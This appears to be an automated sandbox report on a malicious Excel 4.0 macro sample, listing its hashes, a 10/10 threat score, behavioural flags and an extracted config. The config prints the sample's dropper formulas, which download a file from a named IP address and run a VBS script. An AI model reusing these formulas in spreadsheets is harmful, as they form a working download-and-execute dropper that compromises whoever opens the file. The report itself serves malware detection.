General

  • Target

    19c84a9cfa16e5463eee731e3a87fd7c

  • Size

    6KB

  • Sample

    231221-2p8j6sfbbj

  • MD5

    19c84a9cfa16e5463eee731e3a87fd7c

  • SHA1

    a8a1a00dc113b2ac710a79964273d5ef8aef5c52

  • SHA256

    819f4c1bc8e888aaece6fc9843699834b65c11c1dc96b556b0d5adf0a87498a4

  • SHA512

    e15e212aa3a11e3b37d5106bf352fad2815b9e964b941b57a073bd09ae717f672a1df920d42f78de5cd7898bc3eced58b5d17ff2bac7a94da8f8c8ec45a38813

  • SSDEEP

    192:NDSBuSvbrA2OmmfRW8UhHFBFYuwb98ycB3cg+DPaQ+Vgm+ngJwx:NGugM2wg1FYtb98yhz

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      19c84a9cfa16e5463eee731e3a87fd7c

    • Size

      6KB

    • MD5

      19c84a9cfa16e5463eee731e3a87fd7c

    • SHA1

      a8a1a00dc113b2ac710a79964273d5ef8aef5c52

    • SHA256

      819f4c1bc8e888aaece6fc9843699834b65c11c1dc96b556b0d5adf0a87498a4

    • SHA512

      e15e212aa3a11e3b37d5106bf352fad2815b9e964b941b57a073bd09ae717f672a1df920d42f78de5cd7898bc3eced58b5d17ff2bac7a94da8f8c8ec45a38813

    • SSDEEP

      192:NDSBuSvbrA2OmmfRW8UhHFBFYuwb98ycB3cg+DPaQ+Vgm+ngJwx:NGugM2wg1FYtb98yhz

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks